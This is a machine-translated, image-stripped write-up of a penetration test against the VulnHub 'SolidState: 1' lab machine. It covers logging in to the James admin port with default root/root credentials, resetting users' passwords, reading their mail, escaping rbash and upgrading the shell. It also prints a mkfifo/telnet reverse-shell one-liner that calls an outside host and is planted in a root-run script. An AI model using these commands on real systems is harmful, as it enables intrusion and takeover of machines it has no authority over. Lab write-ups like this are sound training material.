当前位置:网站首页>Vulnhub solidstate: 1 target penetration test
Vulnhub solidstate: 1 target penetration test
2022-07-24 05:38:00 【Outstanding, outstanding】
One 、ip Probe

Two 、 Port detection
- Found frequent occurrence of james, also 4555 Port is still running james-admin

3、 ... and 、 Port information collection

- Check the script , Discover the use of root/root Connect 4555 port


Four 、 Port information utilization
4.1 nc Connect 4555 port (root/root)
- found 5 Users , And will 5 User passwords are reset to 123


4.2 Log in to the account in turn , Check email (POP3)
- Use telnet After logging in to the email , Find out john There is a letter about mindy The mail

- Sign in mindy Check the email content in your account , Find out ssh User name and password

4.3 Sign in ssh
- After logging in, I found it was a restricted rbash, Many commands cannot be executed

4.4 rbash Bypass
- stay ssh Try to bypass when logging in

4.5 Upgrade terminal
- Terminal optimization

python -c 'import pty; pty.spawn("/bin/bash")' ctrl + z stty raw -echo;fg export TERM=xterm reset4.6 View other user processes
- adopt /etc/passwd Knowledge still exists james user , View the user process , Get into /opt Catalog , found root File of account Authority

4.7 Write bounce shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet 172.16.9.9 3333 > /tmp/f
4.8 Turn on local monitoring
- Received a rebound shell by root jurisdiction , The right raising is completed .

边栏推荐
- Useref create dynamic reference
- 函数闭包
- special effects - 返回顶部(小猫特效)
- Geoserver REST API功能解析
- 渗透测试知识---行业术语
- mapboxgl + geoserver 配置本地地图教程
- Inventory Poka ecological potential project | cross chain characteristics to promote the prosperity of multi track
- 自定义MVC 2.0
- PyCharm设置代码模板
- Scarcity in Web3: how to become a winner in a decentralized world
猜你喜欢

微信小程序返回携带参数或触发事件

Node connects to MySQL and uses Navicat for visualization

canvas - Bezier 贝塞尔曲线

Latex learning notes (I) - installation configuration

响应式页面

node连接mysql,使用navicat可视化

一文node安装下载和配置

Hurry in!! Take you to understand what is multi file, and easily master the usage of extern and static C language keywords!!!

盘点波卡生态潜力项目 | 跨链特性促进多赛道繁荣

Vulnhub-Funbox: Rookie(Funbox2)靶机渗透
随机推荐
函数闭包
在本地怎么使用phpstudy搭建WordPress网站
模板数据的二次加工
面向 对象
MySQL之函数运用
登录 页面 + 总结心得
Scarcity in Web3: how to become a winner in a decentralized world
THREE——OrbitControls轨道控制器
通用分页2.0
Create a new UMI project, error: rendered more hooks or rendered fewer hooks
根据数组中对象的某个属性值进行排序
Collection = = academic waste
flex布局
过渡 效果
Inventory Poka ecological potential project | cross chain characteristics to promote the prosperity of multi track
Tabs tab (EL tabs)_ Cause the page to jam
canvas - Bezier 贝塞尔曲线
Latex learning notes (I) - installation configuration
网页内嵌B站视频,隐藏相关控件
canvas - 填充